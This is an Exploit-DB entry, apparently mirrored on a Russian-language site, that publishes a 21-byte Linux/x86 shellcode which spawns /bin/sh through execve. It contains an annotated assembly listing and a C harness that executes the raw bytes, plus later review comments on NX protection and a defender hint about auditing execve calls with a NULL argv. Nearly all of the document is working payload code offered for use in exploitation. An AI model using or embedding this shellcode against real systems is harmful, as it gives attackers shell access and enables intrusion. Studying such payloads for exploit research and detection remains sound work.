Exploit Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)

18 Дек 2022
EDB-ID
36857
Проверка EDB
  1. Пройдено
Автор
NOVICEFLUX
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86
CVE
N/A
Дата публикации
2015-04-29
Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)
C:
/*
    #
    # Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes)
    #
    # Dying to be the shortest.
    #
    # Copyright (C) 2015 Gu Zhengxiong ([email protected])
    #
    # 18 February 2015
    #
    # GPL
    #


    # Linux i386 (int $0x80 syscall ABI), GAS AT&T syntax.
    # Builds the string "/bin//sh" on the stack and issues
    # execve(filename, NULL, NULL).  Register roles at the syscall:
    #   %eax = 11 (__NR_execve)   %ebx = filename
    #   %ecx = argv (NULL)        %edx = envp (NULL)
    # Nothing follows the syscall, so there is no exit path if execve fails.
    # Defender note: a shell started by execve with a NULL argv is unusual
    # for legitimate programs and is worth looking for in execve audit
    # records.
    # NOTE(review): newer Linux kernels are reported to log a warning for an
    # execve with an empty argv -- confirm for the kernel in use.
    .global _start
_start:
    # char *const argv[]  -- %ecx = 0, so argv is passed as NULL
    xorl %ecx, %ecx

    # 2 bytes, and both %eax and %edx were zeroed
    # (%edx:%eax = %eax * %ecx = 0, so envp in %edx is NULL too)
    mull %ecx

    # __NR_execve 11  -- only %al is written; the rest of %eax is already 0
    movb $11, %al

    # for '\x00'  -- four zero bytes that terminate the path string
    pushl %ecx
    # 'h' 's' '/' '/'  -- second half of the path; the doubled slash pads
    # the path to two 4-byte pushes
    pushl $0x68732f2f
    # 'n' 'i' 'b' '/'  -- first half; memory at %esp now reads "/bin//sh\0"
    pushl $0x6e69622f

    # const char *filename  -- %ebx points at the string just pushed
    movl %esp, %ebx

    # legacy 32-bit syscall entry; performs the execve set up above
    int $0x80
 */

/*
  gcc -z execstack -m32 push.c

  uname -r
  3.19.3-3-ARCH
 */

#include <stdio.h>
#include <string.h>

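/*
 * Test harness for the 21-byte sequence: prints its length, then calls the
 * bytes as if they were a function.
 *
 * The call only works when the memory holding the string literal is mapped
 * executable.  The literal lives in read-only data, not on the stack, so the
 * build line in the comment above (-z execstack) helps only where the kernel
 * extends that marking to readable data mappings.  On a system enforcing
 * non-executable data (NX / W^X) the call is expected to fault with SIGSEGV,
 * which is the protection doing its job.
 *
 * If the execve inside the sequence succeeds, the process image is replaced
 * and nothing after the call runs.  The sequence has no exit path of its own,
 * so if execve fails, execution continues into whatever bytes follow the
 * literal and the behaviour is undefined.
 */
int
main(void)
{
  /* Assembled form of the _start listing in the comment at the top of the
     file; pointer-to-const because a string literal must not be written. */
  const char *shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68"
    "\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

  /* strlen() returns size_t, so the matching conversion is %zu; the original
     %d is a format/argument mismatch.  strlen() gives the full length here
     only because the sequence contains no 0x00 byte. */
  printf("strlen(shellcode)=%zu\n", strlen(shellcode));

  /* Object-to-function pointer cast: not portable ISO C, accepted by gcc. */
  ((void (*)(void))shellcode)();

  return 0;
}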
 
Источник
www.exploit-db.com
